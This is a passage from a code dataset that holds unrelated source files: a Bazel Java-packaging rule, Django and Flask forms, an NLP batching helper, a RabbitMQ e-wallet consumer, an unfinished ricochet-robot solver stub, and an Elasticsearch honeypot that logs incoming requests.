[TransitiveJarToMavenCoordinatesMapping(mapping = cleaned_mapping)]\n\n\ndef _collect_maven_coordinate_impl(_target, ctx):\n for file in _target.files.to_list():\n if file.extension == 'jar':\n jar_file = file.path\n\n tags = getattr(ctx.rule.attr, \"tags\", [])\n jar_coordinates = \"\"\n\n for tag in tags:\n if tag.startswith(MAVEN_COORDINATES_PREFIX):\n jar_coordinates = tag[len(MAVEN_COORDINATES_PREFIX):]\n\n return [JarToMavenCoordinatesMapping(\n filename = jar_file,\n maven_coordinates = jar_coordinates\n )]\n\n\n_collect_maven_coordinate = aspect(\n attr_aspects = [\n \"jars\",\n \"deps\",\n \"exports\",\n \"runtime_deps\"\n ],\n doc = \"\"\"\n Collects the Maven information for targets, their dependencies, and their transitive exports.\n \"\"\",\n implementation = _collect_maven_coordinate_impl,\n provides = [JarToMavenCoordinatesMapping]\n)\n\n\n_transitive_collect_maven_coordinate = aspect(\n attr_aspects = [\n \"jars\",\n \"deps\",\n \"exports\",\n \"runtime_deps\"\n ],\n required_aspect_providers = [JarToMavenCoordinatesMapping],\n provides = [TransitiveJarToMavenCoordinatesMapping],\n implementation = _transitive_collect_maven_coordinate_impl\n)\n\n\ndef _java_deps_impl(ctx):\n names = {}\n files = []\n filenames = []\n outputPathOverrides = ctx.attr.java_deps_root_overrides\n\n mapping = ctx.attr.target[TransitiveJarToMavenCoordinatesMapping].mapping\n\n for file in ctx.attr.target.data_runfiles.files.to_list() + ctx.attr.target.files.to_list():\n if file.extension == 'jar' and not file.path.startswith(LOCAL_JDK_PREFIX):\n if ctx.attr.maven_name and file.path not in mapping:\n fail(\"{} does not have associated Maven coordinate\".format(file.owner))\n filename = mapping.get(file.path, file.basename).replace('.', '-').replace(':', '-')\n if filename in filenames:\n print(\"Excluded duplicate: {}\".format(filename))\n continue # do not pack JARs 
with same name\n for jarPattern in outputPathOverrides:\n if file.basename == jarPattern or (jarPattern.endswith(\"*\") and file.basename.startswith(jarPattern.rstrip(\"*\"))):\n names[file.path] = outputPathOverrides[jarPattern] + filename + \".jar\"\n break\n if file.path not in names:\n names[file.path] = ctx.attr.java_deps_root + filename + \".jar\"\n files.append(file)\n filenames.append(filename)\n\n jars_mapping = ctx.actions.declare_file(\"{}_jars.mapping\".format(ctx.attr.target.label.name))\n\n ctx.actions.write(\n output = jars_mapping,\n content = str(names)\n )\n\n if not ctx.attr.version_file:\n version_file = ctx.actions.declare_file(ctx.attr.name + \"__do_not_reference.version\")\n version = ctx.var.get('version', '0.0.0')\n\n ctx.actions.run_shell(\n inputs = [],\n outputs = [version_file],\n command = \"echo {} > {}\".format(version, version_file.path)\n )\n else:\n version_file = ctx.file.version_file\n\n ctx.actions.run(\n outputs = [ctx.outputs.distribution],\n inputs = files + [jars_mapping, version_file],\n arguments = [jars_mapping.path, ctx.outputs.distribution.path, version_file.path],\n executable = ctx.executable._java_deps_builder,\n progress_message = \"Generating tarball with Java deps: {}\".format(\n ctx.outputs.distribution.short_path)\n )\n\n\njava_deps = rule(\n attrs = {\n \"target\": attr.label(\n mandatory=True,\n aspects = [\n _collect_maven_coordinate,\n _transitive_collect_maven_coordinate\n ],\n doc = \"Java target to pack into archive\"\n ),\n \"java_deps_root\": attr.string(\n doc = \"Folder inside archive to put JARs into\"\n ),\n \"java_deps_root_overrides\": attr.string_dict(\n doc = \"\"\"\n JARs with filenames matching the given patterns will be placed into the specified folders inside the archive,\n instead of the default folder. 
Patterns can be either the full name of a JAR, or a prefix followed by a '*'.\n \"\"\"\n ),\n \"version_file\": attr.label(\n allow_single_file = True,\n doc = \"\"\"\n File containing version string.\n Alternatively, pass --define version=VERSION to Bazel invocation.\n Not specifying version at all defaults to '0.0.0'\n \"\"\"\n ),\n \"maven_name\": attr.bool(\n doc = \"Name JAR files inside archive based on Maven coordinates\",\n default = False,\n ),\n \"_java_deps_builder\": attr.label(\n default = \"//common:java_deps\",\n executable = True,\n cfg = \"host\"\n )\n },\n implementation = _java_deps_impl,\n outputs = {\n \"distribution\": \"%{name}.tgz\"\n },\n doc = \"Packs Java library alongside with its dependencies into archive\"\n)\n","sub_path":"common/java_deps.bzl","file_name":"java_deps.bzl","file_ext":"bzl","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"156100258","text":"from .models import Collect\nfrom django.forms import ModelForm, HiddenInput\nfrom django.core.validators import ValidationError\n\n\nclass YelpForm(ModelForm):\n\n class Meta:\n model = Collect\n widgets = {'business_name': HiddenInput(), 'slug': HiddenInput()}\n fields = ['link', 'page_amount', 'business_name', 'slug']\n labels = {'link': 'Yelp Link', 'scrape_date': 'Date Scraped',\n 'slug': 'Slug'}\n\n def __init__(self, *args, **kwargs):\n self.results = None\n super(YelpForm, self).__init__(*args, **kwargs)\n\n def clean_link(self):\n link = self.cleaned_data.get('link')\n link = str(link)\n valid_link = ['https', 'http', 'www.']\n if not link:\n raise ValidationError('Enter a valid yelp link!')\n elif not link.startswith(tuple(valid_link)):\n raise ValidationError('Enter a valid yelp link!')\n elif 'www.yelp.com' not in link:\n raise ValidationError('Enter a valid yelp link!')\n else:\n return link\n\n\n","sub_path":"scrape/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"116034776","text":"\"\"\"\n=====================================================================================\n\n Module: Logger\n\n Version: 1.0 January 2020\n Revision: 1\n\n Authors: Paulo Vasconcelos, Pedro Teixeira\n Organization: University of Aveiro\n\n=====================================================================================\n\"\"\"\n\n\nimport sys\n\ndef log(topic, message, aspect):\n\tif(aspect==\"violet\"):\n\t\tprint(f\"{bcolors.VIOLET}\",end='')\n\telif(aspect==\"blue\"):\n\t\tprint(f\"{bcolors.BLUE}\",end='')\n\telif(aspect==\"green\"):\n\t\tprint(f\"{bcolors.GREEN}\",end='')\n\telif(aspect==\"yellow\"):\n\t\tprint(f\"{bcolors.YELLOW}\",end='')\n\telif(aspect==\"red\"):\n\t\tprint(f\"{bcolors.RED}\",end='')\n\telif(aspect==\"bold\"):\n\t\tprint(f\"{bcolors.BOLD}\",end='')\n\telif(aspect==\"underline\"):\n\t\tprint(f\"{bcolors.UNDERLINE}\",end='')\n\tprint(\"[{0}] {1}{2}\".format(topic,message,bcolors.ENDC))\n\nclass bcolors:\n VIOLET = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'","sub_path":"security/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"629341812","text":"\"\"\"\n\nslu helper module\n\n@author: WL\n@date: 2018/12/3\n\n\"\"\"\n\nimport 
os\nimport pickle\nimport numpy as np\nimport random\nimport torch\nfrom config import config\n\nDATA_DIR = \"data/atis\"\n\n\ndef load_raw_data(file):\n \"\"\"\n load raw data\n Args:\n file: raw data file path\n Returns:\n\n \"\"\"\n with open(file, 'rb') as stream:\n ds, dicts = pickle.load(stream)\n print('Done loading: ', file)\n print(' samples: {:4d}'.format(len(ds['query'])))\n\n query, slots, intent = map(ds.get, ['query', 'slot_labels', 'intent_labels'])\n query = list(map(lambda x: list(map(lambda xx: xx+1, x)), query))\n slots = list(map(lambda x: list(map(lambda xx: xx+1, x)), slots))\n data = list(zip(query, slots, intent))\n return np.array(data), dicts\n\n\ndef _batch(data):\n \"\"\"\n upzip data and padding data\n Args:\n data: [(query, slots, intent),...,()]\n\n Returns:\n data: [query1, query2, ... ], [slots1, slots2, ....], [intent1, intent2, ...], [...]\n\n \"\"\"\n\n query, slots, intent = zip(*data)\n # TODO:if there are two intent for one query, this op is no proper\n intent = list(map(lambda x: x[0], intent))\n seq_len = list(map(len, query))\n max_len = max(seq_len)\n for i in range(len(query)):\n if len(query[i]) < max_len:\n query[i].extend([config.padding_idx] * (max_len - len(query[i])))\n slots[i].extend([config.padding_idx] * (max_len - len(slots[i])))\n return \\\n torch.Tensor(query).long(), \\\n torch.Tensor(slots).long(), \\\n torch.Tensor(intent).long(), \\\n torch.Tensor(seq_len).long()\n\n\ndef get_batch(data, shuffle=True):\n \"\"\"\n\n Args:\n data: raw data\n shuffle: shuffle or not\n\n Returns:\n batch data\n \"\"\"\n\n if shuffle:\n random.shuffle(data)\n sindex, eindex = 0, config.batch_size\n while eindex < len(data):\n batch = data[sindex:eindex]\n tmp = eindex\n eindex = eindex + config.batch_size\n sindex = tmp\n\n yield _batch(batch)\n\n if eindex >= len(data):\n batch = data[sindex:]\n yield _batch(batch)\n\n\ndef evaluate(prob_intent, prob_slots, intent, slots):\n \"\"\"\n calculate accuracy of intent and slots\n Args:\n prob_intent: probability of intent, size: B * intent_class_size\n prob_slots: probability of slots, size: B * seq_len * slot_size\n intent: intent label, size: B\n slots: slots label, size: B * seq_len\n\n Returns:\n accuracy_intent: acc of intent\n accuracy_slots: acc of slots\n \"\"\"\n\n # for intent\n pred_intent = torch.argmax(prob_intent, dim=1)\n accuracy_intent = torch.sum(pred_intent == intent).data.item() / pred_intent.size(0)\n\n # slots\n pred_slots = torch.argmax(prob_slots, dim=2)\n accuracy_slots = torch.sum(pred_slots == slots).data.item() / (pred_slots.size(0) * pred_slots.size(1))\n\n return accuracy_intent, accuracy_slots\n\n\ndef print_class_name(name):\n def deco(func):\n def wrapper():\n print(\"=\" * 10, name, \"=\" * 10)\n func()\n print(\"=\" * 10, name, \"=\" * 10)\n return wrapper\n return deco\n\n\nif __name__ == \"__main__\":\n\n intent = torch.Tensor([1, 2, 2]).long()\n slots = torch.Tensor([[1, 2, 2], [3, 2, 0]]).long()\n # [1, 1, 2] 0.67\n prob_intent = torch.Tensor([[0.5, 0.6, 0.4], [0.1, 0.2, 0.1], [0.1, 0.2, 0.4]])\n # [1, 1, 2], [1, 1, 0] 0.5\n prob_slots = torch.Tensor([[[0.5, 0.6, 0.4], [0.1, 0.2, 0.1], [0.1, 0.2, 0.4]],\n [[0.5, 0.6, 0.4], [0.1, 0.2, 0.1], [0.5, 0.2, 0.1]]])\n acc_intent, acc_slots = evaluate(prob_intent, prob_slots, intent, slots)\n\n print(\" Expect Acc is {:4f} and {:4f}\".format(0.67, 0.5))\n print(\"while real Acc is {:4f} and {:4f}\".format(acc_intent, acc_slots))\n\n train_data, dicts = load_raw_data(os.path.join(DATA_DIR, 'atis.train.pkl'))\n batch = 
get_batch(train_data)\n query, slots, intent, seq_len = next(batch)\n print(query[:2])\n print(slots[:2])\n print(intent[:2])\n","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196064731","text":"import cPickle as pickle\nfrom global_module.settings_module import set_dir\n\nrel_dir = set_dir.Directory('TR')\n\n\ndef convert(test_filename):\n label_dict = pickle.load(open(rel_dir.label_map_dict, 'rb'))\n test_file = open(test_filename, 'r')\n op_file = open(test_filename + '_output.txt', 'w')\n\n new_map = {}\n\n for actual_id, mapped_id in label_dict.iteritems():\n new_map[mapped_id] = actual_id\n\n for line in test_file:\n line = line.strip()\n op_file.write(new_map[int(line) - 1] + '\\n')\n\n op_file.close()\n test_file.close()\n\n # convert('/home/aykumar/aykumar_home/self/deep-text-classifier/global_module/utility_dir/folder1/output/dummy_rnn.txt')\n","sub_path":"global_module/utility_code/convert_pred_to_class.py","file_name":"convert_pred_to_class.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"564438568","text":"import datetime\nimport logging\nimport random\nfrom shapely import geometry\n\nfrom google.appengine.ext import ndb\n\nfrom dancedeets.events import eventdata\n\nMAX_OBJECTS = 100\n\n\nclass FeaturedResult(ndb.Model):\n event_id = ndb.StringProperty()\n json_props = ndb.JsonProperty(indexed=False)\n\n @property\n def polygon(self):\n return geometry.Polygon(self.json_props['polygon'])\n\n @property\n def showTitle(self):\n return self.json_props.get('showTitle', True) == True\n\n @property\n def promotionText(self):\n return self.json_props.get('promotionText', None)\n\n @property\n def manualImage(self):\n return self.json_props.get('manualImage', False)\n\n\ndef get_featured_events_for(southwest, northeast):\n\n if not southwest or not northeast:\n testing_featured_results_offline = False\n if testing_featured_results_offline:\n relevant_featured = FeaturedResult.query().fetch(MAX_OBJECTS)\n else:\n relevant_featured = []\n else:\n featured_results = FeaturedResult.query().fetch(MAX_OBJECTS)\n search_polygon = geometry.Polygon([\n # lat (y), long (x)\n (southwest[0], southwest[1]),\n (southwest[0], northeast[1]),\n (northeast[0], northeast[1]),\n (northeast[0], southwest[1]),\n ])\n relevant_featured = [x for x in featured_results if search_polygon.intersects(x.polygon)]\n random.shuffle(relevant_featured)\n\n featured_events = eventdata.DBEvent.get_by_ids([x.event_id for x in relevant_featured])\n featured_infos = []\n for featured_result, featured_event in zip(relevant_featured, featured_events):\n if featured_event.is_past():\n logging.info('Discarding featured event in the past: %s', featured_event.id)\n continue\n featured_infos.append({\n 'event': featured_event,\n 'showTitle': featured_result.showTitle,\n 'promotionText': featured_result.promotionText,\n 'manualImage': featured_result.manualImage,\n })\n return featured_infos\n","sub_path":"server/dancedeets/events/featured.py","file_name":"featured.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"271387016","text":"from bottle import route, request, response, error, hook\nimport os\nimport base64\nimport datetime\nimport logging\n\nlogger = 
logging.getLogger(\"elasticpot.views\")\n\ntemplate_folder = os.path.join(os.path.dirname(__file__), 'templates')\n\n\n@hook('before_request')\ndef logData():\n querystring = request.path\n if request.query_string:\n querystring += '?' + request.query_string\n\n headers = '\\n'.join(\n ': '.join((h, request.headers[h])) for h in request.headers\n )\n\n body = ''\n if request.method in ('POST', 'PUT'):\n body = ''.join(chunk.decode('utf-8') for chunk in request.body)\n\n full_request = ''.join((\n request.method,\n ' ',\n querystring,\n ' ',\n request.environ.get('SERVER_PROTOCOL', 'HTTP/1.0'),\n '\\n',\n headers,\n '\\n\\n',\n body\n ))\n\n # base64 encode\n raw = base64.b64encode(full_request.encode('utf-8')).decode('ascii')\n\n curDate = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')\n data = {}\n data['timestamp'] = curDate\n data['src_ip'] = request.environ.get('REMOTE_ADDR')\n data['src_port'] = request.environ.get('REMOTE_PORT', 44927)\n data['dest_ip'] = request.app.config['main']['ip']\n data['dest_port'] = request.environ['SERVER_PORT']\n\n data['method'] = request.method\n data['querystring'] = querystring\n data['headers'] = headers\n data['body'] = body\n data['request'] = full_request\n data['raw'] = raw\n\n request.app.outputs.send(data)\n\n\n# Handle index site\n@route('/', method='GET')\ndef index():\n logger.info(\"Scanned (/)\")\n\n response.content_type = 'application/json'\n\n with open(os.path.join(template_folder, 'index.txt')) as fp:\n return fp.read()\n\n\n# handle irrelevant / error requests\n@error(404)\ndef error404(error):\n logger.info(\"Access to non existing resource: \" + request.url)\n\n response.content_type = 'application/json'\n\n with open(os.path.join(template_folder, '404.txt')) as fp:\n return fp.read()\n\n\n# handle favicon\n@route('/favicon.ico', method='GET')\ndef favicon():\n with open(os.path.join(template_folder, 'favicon.ico.txt')) as fp:\n return fp.read()\n\n\n# handle route to indices\n@route('/_cat/indices', method='GET')\ndef getindeces():\n logger.info(\"Found possible attack (/_cat/indices): \" + request.url)\n\n with open(os.path.join(template_folder, 'getindeces.txt')) as fp:\n return fp.read()\n\n\n# handle search route (GET)\n@route('/_search', method='GET')\ndef handleSearchExploitGet():\n logger.info(\"Found possible attack (_search): \" + request.url)\n return \"\"\n\n\n# handle search route (POST)\n@route('/_search', method='POST')\ndef handleSearchExploit():\n logger.info(\"Found possible attack (_search): \" + request.url)\n return \"\"\n\n\n# handle head plugin\n@route('/_plugin/head')\ndef pluginhead():\n logger.info(\"Access to ElasticSearch head plugin: \" + request.url)\n\n response.content_type = 'text/html'\n\n with open(os.path.join(template_folder, 'pluginhead.txt')) as fp:\n return fp.read()\n","sub_path":"elasticpot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"399132934","text":"#!/usr/bin/env python\nimport time\nimport json\nimport pika\nimport threading\nfrom datetime import datetime\n\nfrom publisher import EWalletPublisher\nfrom tinydb import TinyDB, Query\n\nFULL_QUORUM = 8\nHALF_QUORUM = 5\nNO_QUORUM = 0\n\nclass EWalletConsumer():\n def __init__(self, queue_url, npm, publisher):\n self.queue_url = queue_url\n self.credentials = pika.PlainCredentials('sisdis', 'sisdis')\n self.npm = npm\n\n self.ex_ping = 'EX_PING'\n self.ex_register = 'EX_REGISTER'\n self.ex_saldo = 
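The `logData` hook in the `elasticpot/views.py` record above rebuilds the raw HTTP request as request line, header block, blank line, body, and base64-encodes the result. The same reconstruction as a standalone function (a sketch; the sample values below are made up):

```python
import base64

def encode_raw_request(method, path, protocol, headers, body=''):
    # request line + "Name: value" header lines + blank line + body
    request_line = '{} {} {}'.format(method, path, protocol)
    header_block = '\n'.join(': '.join(item) for item in headers.items())
    raw = '\n'.join((request_line, header_block, '', body))
    return base64.b64encode(raw.encode('utf-8')).decode('ascii')

print(encode_raw_request('GET', '/_search?q=*', 'HTTP/1.1', {'Host': 'honeypot'}))
```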
'EX_GET_SALDO'\n self.ex_transfer = 'EX_TRANSFER'\n self.ex_total_saldo = 'EX_GET_TOTAL_SALDO'\n self.publisher = publisher\n\n self.db = TinyDB('db.json')\n self.DB = Query()\n\n self.transfer_user_id = None\n self.transfer_nilai = None\n\n def _get_neighbors(self):\n return [\n '1306398983', # irfan\n '1406579100',\n '1406527620',\n '1406572025',\n '1406543712',\n '1406543826',\n '1406543845', # gilang\n '1406543574', # oda\n # '1406559055', # ghozi\n # '1406572025', # adit\n # '1406543883', # jefly\n # '1406559036', # gales\n ]\n\n def _get_active_neighbors(self):\n print('Checking QUORUM')\n neighbors = self._get_neighbors()\n active = []\n\n for neighbor in neighbors:\n try:\n result = self.db.get((self.DB.user_id == neighbor) & (self.DB.ts.exists()))\n\n if result is not None:\n ts_now = datetime.now()\n ts_neighbor_str = result['ts']\n ts_neighbor = datetime.strptime(ts_neighbor_str, '%Y-%m-%d %H:%M:%S')\n\n ts_diff = (ts_now - ts_neighbor).seconds\n print('PING Time diff {}: {} seconds'.format(neighbor, ts_diff))\n if ts_diff <= 10:\n active.append(neighbor)\n else:\n print('PING Not found {}'.format(neighbor))\n except Exception as e:\n print('Error retrieving from db: {}'.format(e.message))\n\n return active\n\n def _quorum_check(self):\n quorum = len(self._get_active_neighbors())\n print('QUORUM={}'.format(quorum))\n\n return quorum\n\n def _has_registered(self, user_id):\n result = self.db.get((self.DB.user_id == user_id) & (self.DB.nilai_saldo.exists()))\n if result is not None:\n print(\"{} has registered\".format(user_id))\n return True\n return False\n\n def _retrieve_saldo(self, user_id):\n result = self.db.get((self.DB.user_id == user_id) & (self.DB.nilai_saldo.exists()))\n if result is not None:\n value = int(result['nilai_saldo'])\n print(\"Retrieving saldo of {}, value {}\".format(user_id, value))\n return value\n return -1\n\n def _update_saldo(self, user_id, nilai):\n result = self.db.get((self.DB.user_id == user_id) & (self.DB.nilai_saldo.exists()))\n if result is not None:\n initial_value = result['nilai_saldo']\n final_value = int(initial_value) + int(nilai)\n self.db.update({\n 'nilai_saldo': final_value\n }, self.DB.user_id == user_id)\n\n print('Updating {}\\'s saldo from {} to {}', user_id, initial_value, final_value)\n return 1\n print('Failed updating saldo. 
User id {} not found.'.format(user_id))\n return -4\n\n # message = dict\n def _update_db(self, message):\n result = self.db.get(self.DB.user_id == message['user_id'])\n\n if result is not None:\n self.db.update({\n 'ts': message['ts']\n }, self.DB.user_id == message['user_id'])\n print(\"DB updated: {}\".format(message))\n else:\n self.db.insert(message)\n print(\"DB inserted: {}\".format(message))\n\n def _ping_callback(self, ch, method, properties, body):\n print(\"PING received: {}\".format(body))\n body = json.loads(body)\n\n message = {\n 'user_id': body['npm'],\n 'ts': body['ts']\n }\n\n self._update_db(message)\n\n def _register_response_callback(self, ch, method, properties, body):\n print('Received REGISTER RESPONSE: {}'.format(body))\n ch.connection.close()\n\n def _register_request_callback(self, ch, method, properties, body):\n print('Received REGISTER REQUEST: {}'.format(body))\n\n body = json.loads(body)\n sender_id = body['sender_id']\n\n try:\n message = {\n 'user_id': body['user_id'],\n 'nama': body['nama'],\n 'nilai_saldo': 0\n }\n\n if self._quorum_check() >= HALF_QUORUM:\n if not self._has_registered(body['user_id']):\n self._update_db(message)\n status_register = 1\n else:\n status_register = -4\n else:\n status_register = -2\n except:\n status_register = -99\n\n self.publisher.publish_register_response(status_register=status_register, sender_id=sender_id)\n\n def _saldo_response_callback(self, ch, method, properties, body):\n print('Received GET SALDO RESPONSE: {}'.format(body))\n ch.connection.close()\n\n def _saldo_request_callback(self, ch, method, properties, body):\n print('Received GET SALDO REQUEST: {}'.format(body))\n\n body = json.loads(body)\n sender_id = body['sender_id']\n\n try:\n if self._quorum_check() >= HALF_QUORUM:\n nilai_saldo = self._retrieve_saldo(body['user_id'])\n else:\n nilai_saldo = -2\n except:\n nilai_saldo = -99\n\n self.publisher.publish_saldo_response(nilai_saldo=nilai_saldo, sender_id=sender_id)\n\n def _transfer_response_callback(self, ch, method, properties, body):\n print('Received TRANSFER RESPONSE: {}'.format(body))\n\n body = json.loads(body)\n action = body['action']\n status_transfer = int(body['status_transfer'])\n\n if action == 'transfer':\n if status_transfer == 1:\n if self.transfer_user_id and self.transfer_nilai:\n # subtract current saldo\n self._update_saldo(user_id=self.transfer_user_id,\n nilai=-self.transfer_nilai)\n\n ch.connection.close()\n self.transfer_user_id = None\n self.transfer_nilai = None\n\n def _transfer_request_callback(self, ch, method, properties, body):\n print('Received TRANSFER REQUEST: {}'.format(body))\n\n body = json.loads(body)\n sender_id = body['sender_id']\n\n try:\n if self._quorum_check() >= HALF_QUORUM:\n status_transfer = self._update_saldo(body['user_id'], body['nilai'])\n else:\n status_transfer = -2\n except:\n status_transfer = -99\n\n self.publisher.publish_transfer_response(status_transfer=status_transfer, sender_id=sender_id)\n\n def _total_saldo_response_callback(self, ch, method, properties, body):\n print('Received GET TOTAL SALDO RESPONSE: {}'.format(body))\n ch.connection.close()\n\n def _total_saldo_request_callback(self, ch, method, properties, body):\n print('Received GET TOTAL SALDO REQUEST: {}'.format(body))\n\n body = json.loads(body)\n sender_id = body['sender_id']\n user_id = body['user_id']\n try:\n active_neighbors = self._get_active_neighbors()\n neighbor_count = len(active_neighbors)\n\n if neighbor_count >= HALF_QUORUM:\n\n consumer = 
TotalSaldoConsumer(queue_url=self.queue_url,\n npm=self.npm,\n publisher=self.publisher,\n neighbor_count=neighbor_count)\n\n consume_thread = threading.Thread(\n target=consumer.consume_saldo_response_total\n )\n consume_thread.start()\n time.sleep(0.5)\n\n for neighbor in active_neighbors:\n print('Sending GET SALDO REQUEST to: {}'.format(neighbor))\n self.publisher.publish_saldo_request(user_id, neighbor)\n else:\n nilai_saldo = -2\n self.publisher.publish_total_saldo_response(nilai_saldo=nilai_saldo,\n sender_id=sender_id)\n except:\n nilai_saldo = -99\n self.publisher.publish_total_saldo_response(nilai_saldo=nilai_saldo,\n sender_id=sender_id)\n\n def consume_ping(self):\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.queue_url,\n credentials=self.credentials))\n channel = connection.channel()\n\n channel.exchange_declare(exchange=self.ex_ping,\n exchange_type='fanout')\n\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=self.ex_ping,\n queue=queue_name)\n channel.basic_consume(self._ping_callback,\n queue=queue_name,\n no_ack=True)\n channel.start_consuming()\n\n def _consume_direct(self, routing_key, exchange_name, callback):\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.queue_url,\n credentials=self.credentials))\n channel = connection.channel()\n\n channel.exchange_declare(exchange=exchange_name,\n exchange_type='direct',\n durable=True)\n\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=exchange_name,\n queue=queue_name,\n routing_key=routing_key)\n channel.basic_consume(consumer_callback=callback,\n queue=queue_name,\n no_ack=True)\n channel.start_consuming()\n\n def consume_register_response(self):\n routing_key = 'RESP_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_register, self._register_response_callback)\n\n def consume_register_request(self):\n routing_key = 'REQ_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_register, self._register_request_callback)\n\n def consume_saldo_response(self):\n routing_key = 'RESP_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_saldo, self._saldo_response_callback)\n\n def consume_saldo_request(self):\n routing_key = 'REQ_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_saldo, self._saldo_request_callback)\n\n def consume_transfer_request(self):\n routing_key = 'REQ_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_transfer, self._transfer_request_callback)\n\n def consume_transfer_response(self):\n routing_key = 'RESP_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_transfer, self._transfer_response_callback)\n\n def consume_total_saldo_request(self):\n routing_key = 'REQ_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_total_saldo, self._total_saldo_request_callback)\n\n def consume_total_saldo_response(self):\n routing_key = 'RESP_{}'.format(self.npm)\n self._consume_direct(routing_key, self.ex_total_saldo, self._total_saldo_response_callback)\n\n\nclass TotalSaldoConsumer():\n def __init__(self, queue_url, npm, publisher, neighbor_count):\n self.queue_url = queue_url\n self.credentials = pika.PlainCredentials('sisdis', 'sisdis')\n self.npm = npm\n self.ex_saldo = 'EX_GET_SALDO'\n self.publisher = publisher\n\n self.neighbor_count = neighbor_count\n\n self.total_saldo = 0\n\n def _saldo_total_response_callback(self, ch, method, properties, 
body):\n print('Received GET SALDO RESPONSE (TOTAL): {}'.format(body))\n\n body = json.loads(body)\n nilai_saldo = int(body['nilai_saldo'])\n\n self.neighbor_count -= 1\n print('USER_COUNT={}'.format(self.neighbor_count))\n\n if nilai_saldo not in [-1, -2, -4, -99]:\n self.total_saldo += nilai_saldo\n\n if self.neighbor_count <= 0:\n print('Closing connection')\n ch.connection.close()\n print ('Publishing result response')\n self.publisher.publish_total_saldo_response(nilai_saldo=self.total_saldo,\n sender_id=self.npm)\n\n def consume_saldo_response_total(self):\n print('Consuming saldo response total')\n routing_key = 'RESP_{}'.format(self.npm)\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.queue_url,\n credentials=self.credentials))\n channel = connection.channel()\n\n channel.exchange_declare(exchange=self.ex_saldo,\n exchange_type='direct',\n durable=True)\n\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(exchange=self.ex_saldo,\n queue=queue_name,\n routing_key=routing_key)\n channel.basic_consume(consumer_callback=self._saldo_total_response_callback,\n queue=queue_name,\n no_ack=True)\n print('Starting consumption saldo response total')\n\n channel.start_consuming()\n\n print('Finish consuming saldo response total')\n channel.connection.close()\n","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":14254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"262913030","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 22 22:24:39 2019\n\n@author: Martin\n\"\"\"\n\n\n# Classe solveur pour le jeu ricochets robot\n\n# Utilisation du type deque pour piles et files.\n\nfrom collections import deque\nimport game as g\n\n\nclass RRSolveur :\n \n def __init__(game_controler , state_encoder) :\n self.gc = game_controler\n \n self.actions = game_controler.actions()\n node_0 = state_encoder.encode(game_controler.initial_state()) \n \n \n \n \n def Solve(game) :\n \"\"\" game est un objet de classe Game \"\"\"\n \n # Listes des actions possibles \n \n \n actions = deque([]) # pile des actions\n \n initial_state = game.state()\n states = { initial_state : None} # dictionnaire des états \n \n node_queue = deque ([initial_state])\n \n \n \n \n \n \n ","sub_path":"rrsolveur.py","file_name":"rrsolveur.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"151353625","text":"from flask import Flask, render_template, redirect, url_for, request, flash\r\nimport INSERT_Values_DB\r\n\r\napp = Flask(__name__)\r\napp.secret_key = b'_vasu2L\"F4Q8z\\n\\xec]/'\r\n\r\n\r\n@app.route('/')\r\ndef render_static():\r\n return render_template('Personal_Details.html')\r\n\r\n\r\n@app.route('/insert', methods=['POST'])\r\ndef insert():\r\n if request.method == 'POST':\r\n ######\r\n eid = request.form['EID']\r\n gender = request.form['gender']\r\n BloodGrp = request.form[\"bldgrp\"]\r\n Addr_Line_1 = request.form['Addr_Line_1']\r\n Addr_Line_2 = request.form['Addr_Line_2']\r\n City = request.form['City']\r\n State = request.form['State']\r\n PIN = request.form['PIN']\r\n x = INSERT_Values_DB.dup_check(eid) #calling duplicate values cheacking function.\r\n print(x)\r\n if(x!=None):\r\n flash(\"Eployee ID Alerady exist\", \"error\")\r\n return render_template('Personal_Details.html')\r\n\r\n else:\r\n INSERT_Values_DB.insertValues(eid, gender, 
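Every `consume_*` method in the `consumer.py` record above follows one pattern: declare a direct exchange, bind a fresh exclusive queue on this node's routing key, and block on delivery. The record uses the pre-1.0 pika keyword names (`consumer_callback`, `no_ack`); the equivalent under the pika 1.x API looks like this (a sketch, with host and credentials as placeholders):

```python
import pika

def consume_direct(host, exchange, routing_key, callback,
                   username='guest', password='guest'):
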